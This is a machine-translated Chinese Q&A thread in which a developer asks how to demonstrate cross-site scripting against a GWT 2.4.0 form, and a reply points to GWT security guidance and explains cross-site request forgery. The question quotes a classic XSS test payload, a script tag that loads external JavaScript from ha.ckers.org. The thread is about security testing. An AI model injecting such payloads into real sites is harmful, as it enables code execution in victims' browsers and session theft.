我一直在寻找演示示例xss攻击通过GWT(V2.4.0)。我创建了一个表单(GET方法)与HTML文本区域和提交按钮,提交它通过gwt rpc调用服务器,如果存在xss漏洞,示例测试用例//<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> //
不应该被过滤。但这不起作用,请问任何人请分享如何执行xss攻击?只是概述或要点就可以。GWT -xss(跨站点脚本)演示
1
A
回答
1
看https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
还有就是如何使用HTML内发动攻击的例子。请参阅节设置的innerHTML
它给人的页面上的对策以及
代码。
如果你正在谈论XSRF,然后根据提示
跨站请求伪造(XSRF或CSRF)是一种类型的网络攻击 的其中一个攻击者可以代表经过身份验证的 用户执行操作没有用户的知识。通常,它涉及到制作一个恶意HTML页面,该页面一旦被受害者访问,将导致受害者的浏览器向第三方域发布攻击者控制的请求。如果受害人通过第三方域名 认证,则该请求将与该域名的浏览器Cookie一起发送,并且可能会触发受害者的代表 的不良行为并且未经受害人同意 - 例如,删除或 修改博客或添加邮件转发规则。
,你可以只让一个页面发送(未认证)的RPC请求,如果你的浏览器沿已认证用户的Cookie传递和RPC调用成功,那么攻击的工作。
相关问题
- 1. 防止XSS(跨站点脚本)
- 2. 跨站点脚本攻击(xss)攻击
- 3. 如何执行跨站点脚本(XSS)
- 4. 跨站点脚本
- 5. 跨站点脚本
- 6. 跨站点脚本?
- 7. playframework 1.x处理跨站点脚本(xss)吗?
- 8. 跨站点脚本(XSS):我需要逃避&符号吗?
- 9. XSS跨站点脚本 - Jsp <Input>标记
- 10. 避免跨站点脚本
- 11. document.domain和跨站点脚本
- 12. 跨站点脚本预防
- 13. htmltextwriter和跨站点脚本
- 14. 跨站点脚本表单
- 15. 跨站点脚本帮助?
- 16. 如何保护网站免受xss(跨网站脚本)
- 17. 我期刊网站上的XSS(跨网站脚本)错误难点
- 18. 关于跨站脚本问题的另一个问题(XSS)
- 19. .NET HTML白名单(反xss /跨站脚本)
- 20. 如何阻止我们的跨站脚本(XSS)URL?
- 21. XSS - SQL注入 - OWASP VS AntiXss Vs的微软反跨站点脚本库
- 22. CPAN中是否有一个用于过滤跨站点脚本(XSS)的好库?
- 23. 的VeraCode - 这调用域名()包含一个跨站点脚本(XSS)漏洞
- 24. Jboss/Apache级别的HTML编码,用于处理XSS跨站点脚本
- 25. 是否可以在移动Safari中允许跨站点脚本(XSS)?
- 26. 微软反跨站点脚本库
- 27. 防止PHP中的跨站点脚本
- 28. Fortify跨站点脚本:验证不佳
- 29. 跨站点脚本 - Cookie加密
- 30. 从图像中跨站点脚本
我正在寻找xss攻击:),在xsrf之间提供信息 – Rangesh 2012-07-21 06:04:43
是的,有一个示例,您可以在第一个链接中使用设置innerHTML的代码 – user1258245 2012-07-21 06:30:36